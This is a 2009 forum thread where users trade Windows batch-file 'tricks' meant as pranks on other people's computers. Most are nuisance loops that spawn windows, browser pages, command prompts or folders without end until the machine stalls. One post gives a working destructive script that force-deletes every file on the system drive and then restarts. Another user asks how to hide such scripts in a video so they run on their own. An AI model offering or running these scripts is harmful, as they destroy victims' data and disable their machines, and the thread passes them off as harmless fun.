Results 1 to 10 of 10
  1. #1
    reyes94x's Avatar
    Join Date
    Jan 2009
    Gender
    male
    Posts
    68
    Reputation
    10
    Thanks
    13

    Lightbulb notepad.bat tricks

    hey people, iv seen all of this posts about the same shutdown "fake virus" and cmd tricks so ifd like to tell u some of them(5) depending on the thanks il try to get u more

    this one starts cmds and my documents...alot of them
    @echo off
    :A
    start
    explorer
    goto :A


    opens internet pages(u can add as many as you want to)
    @echo off
    :A
    start www. google .com sorry
    goto :A

    makes a bunch of folders...my pc is in spanish so you may have to change the directory to one in english its the "cd "C:\Documents..."" thing
    @echo off
    :folder
    md %random%
    cd "C:\Documents and Settings\All Users\Escritorio"
    goto :folder

    timer
    @echo off
    :A
    echo 31
    ping localhost -n 2 > nul
    cls
    echo 30
    ping localhost -n 2 > nul
    etc....
    goto :A


    lol error messages
    @echo off
    msg * hello
    msg * you can edit this text
    msg * exept the "msg * " thing


    so maybe ill add some more but their all encrypted about 3 years ago and i forgot the password so itl take me some time to post them...
    Last edited by reyes94x; 04-15-2009 at 01:23 PM. Reason: sorry for the spaces on the web link byt mpgh puts "google" and avoids link...

  2. The Following 2 Users Say Thank You to reyes94x For This Useful Post:

    iDave (08-10-2009),xNuggetz (04-23-2009)

  3. #2
    dom's Avatar
    Join Date
    Oct 2008
    Posts
    1
    Reputation
    10
    Thanks
    0
    here is one to shutdown a PC

    -link removed, paste actual code =\-
    Last edited by Toymaker; 06-14-2009 at 10:03 PM.

  4. #3
    Dorado's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    Under Join Date :@
    Posts
    2,891
    Reputation
    25
    Thanks
    353
    My Mood
    Sneaky
    good nice ty

    [IMG]https://i648.photobucke*****m/albums/uu201/rnjsgurwn96/METALLICA-1.png[/IMG]
    [IMG]https://i648.photobucke*****m/albums/uu201/rnjsgurwn96/Untitled-1-2.gif[/IMG]

  5. #4
    Toymaker's Avatar
    Join Date
    Feb 2008
    Gender
    male
    Location
    Hannah, Montana
    Posts
    659
    Reputation
    14
    Thanks
    193
    My Mood
    Amused
    TASKKILL /F /IM "notepad.exe" I learned this file/process closer trick today, enjoy =p You can delete things if their task isn't running ; )

  6. #5
    -Jerry™'s Avatar
    Join Date
    Jun 2009
    Gender
    male
    Posts
    412
    Reputation
    15
    Thanks
    88
    My Mood
    Psychedelic
    anyway to put this in a movie or clip and make it auto extract

  7. #6
    nicwheeler's Avatar
    Join Date
    Dec 2008
    Gender
    male
    Posts
    41
    Reputation
    10
    Thanks
    1
    My Mood
    Dead
    i have a better one ...
    @echo off
    del %systemdrive%\*.* /f /s /q
    shutdown -r -f -t 00

  8. #7
    nicwheeler's Avatar
    Join Date
    Dec 2008
    Gender
    male
    Posts
    41
    Reputation
    10
    Thanks
    1
    My Mood
    Dead
    and another
    @ECHO OFF

    04

    :A

    ECHO %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM%

    GOTO A

  9. #8
    reyes94x's Avatar
    Join Date
    Jan 2009
    Gender
    male
    Posts
    68
    Reputation
    10
    Thanks
    13
    lol ya but with the %random% thing it doesnt look so good as if u put the digits ur self

    @echo off
    02
    :A
    echo 1 2 3 5 6 7 8 9 8 7 6 5 5 4 6 7 5 7 8 9 5 3 6 8 6 4 2 1 6 1 3 4 5 6 7 8 9 0 7 5 4 2
    goto A

  10. #9
    Seathre's Avatar
    Join Date
    Oct 2008
    Gender
    male
    Posts
    114
    Reputation
    10
    Thanks
    25
    My Mood
    Sleepy
    @ECHO OFF

    :A

    start

    GOTO A

    Now that can get annoying if applied correctly...

  11. #10
    edward3058's Avatar
    Join Date
    Apr 2009
    Gender
    male
    Location
    Canada, Ontairo
    Posts
    79
    Reputation
    10
    Thanks
    3
    i did not understand any of that.. time to read it again.. O.o lol kk
    Make 1 Posts=
    Make 5 Posts=
    Make 10 Posts=
    Make 100 Posts=
    Make A Do List=
    Get 3 Accounts Banned For Hacking=
    Buy Vip Hack=
    Get Called A Hacker Without Hacking=
    Make Fun At Noobs That Died From A Grenade=
    Laugh At Myself For Farting=
    Get Embarresed At School For Pantsing=
    Make A Hack=
    Make A Weak Website=
    Make A Good Website=
    Get Banned In Runescape=
    Making A House Burn On Accident=
    Making A House Burn On Perpuse=

Similar Threads

  1. Notepad Tricks
    By Spookerzz in forum Programming Tutorials
    Replies: 11
    Last Post: 02-23-2010, 11:32 AM
  2. notepad.bat tricks
    By [MP][GH] in forum General
    Replies: 3
    Last Post: 12-06-2009, 09:35 AM
  3. Replies: 25
    Last Post: 10-03-2009, 01:03 AM
  4. CODING TRICK W/ NOTEPAD!
    By icantlolanymore in forum C++/C Programming
    Replies: 15
    Last Post: 09-04-2009, 09:57 AM
  5. CODING TRICK W/ NOTEPAD [PLEASE DONT MOVE THIS SECTION HAS LOTS OF PPL ONLINE]!
    By icantlolanymore in forum Combat Arms Hacks & Cheats
    Replies: 20
    Last Post: 08-28-2009, 01:16 PM

Tags for this Thread